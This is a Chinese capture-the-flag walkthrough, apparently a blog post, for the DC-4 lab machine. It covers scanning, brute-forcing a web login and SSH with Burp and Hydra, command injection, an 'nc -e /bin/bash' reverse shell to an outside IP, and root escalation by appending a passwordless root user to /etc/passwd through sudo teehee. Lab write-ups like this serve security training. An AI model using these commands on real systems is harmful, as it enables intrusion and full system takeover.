DC-4靶机

一、搭建环境

  1. 下载靶机:https://www.five86.com/downloads.html

  1. 解压靶机得到一个.ova文件

  1. 利用虚拟机打开文件,将网卡设置成NAT模式,启动虚拟机

二、渗透过程

  1. 使用namp扫描主机地址

nmap -sP 192.168.XX.0/24

在使用arp-scan扫描一次

arp-scan -l

扫描一下主机开启的服务和端口,开启80和22端口

2.访问80端口,没有更多的信息了

扫描了一下目录也没有发现其他目录

  1. 看到登录框那就尝试抓包爆破一下

将抓取到的包放入intruder里面,这里先尝试用户名admin爆破密码

发现密码为happy,输入账号和密码,登入发现为下图

在尝试抓包看一下

抓到包看到这里好像是个命令,放进repeater里尝试修改,看看能不能执行其他命令

看来就是命令

  1. 那就写个反弹shell

nc+-e+/bin/bash+192.168.88.147+7777

成功连接反弹shell,做一个交互shell

python -c 'import pty;pty.spawn("/bin/bash")'

进入家目录发现下面有三个用户

尝试进入这三个用户目录,发现只有jim有权限访问,并且发现一个旧的密码本

想到还有22端口开放,拿着那个旧密码本去尝试爆破jim的远程登录密码

hydra -l jim -P jim.txt 192.168.88.168 ssh

爆出jim的密码,使用jim远程连接,查看jim家目录里面的mbox文件

是一封邮件,root写给jim的,由此联想到该系统上默认邮件箱里是不是也有邮件呢?

发现了一封邮件,能看到Charles的密码:^xHhA&hvim0y

查看jim有没有可以执行提权的文件,发现没有

尝试切换到clarles用户,这里注意用户名小写,看一下/etc/passwd里面用户就知道了

  1. 到clarles家目录下发现没有文件,那就看看有没有提权的文件,看到有个文件teehee

  1. 查看teehee使用说明,teehee提权是使用teehee  -a 把一个账号密码写入到etc/passwd中,这个用户具有root权限,再切换到这个用户即可

echo "qqq::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
  1. 拿到flag

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值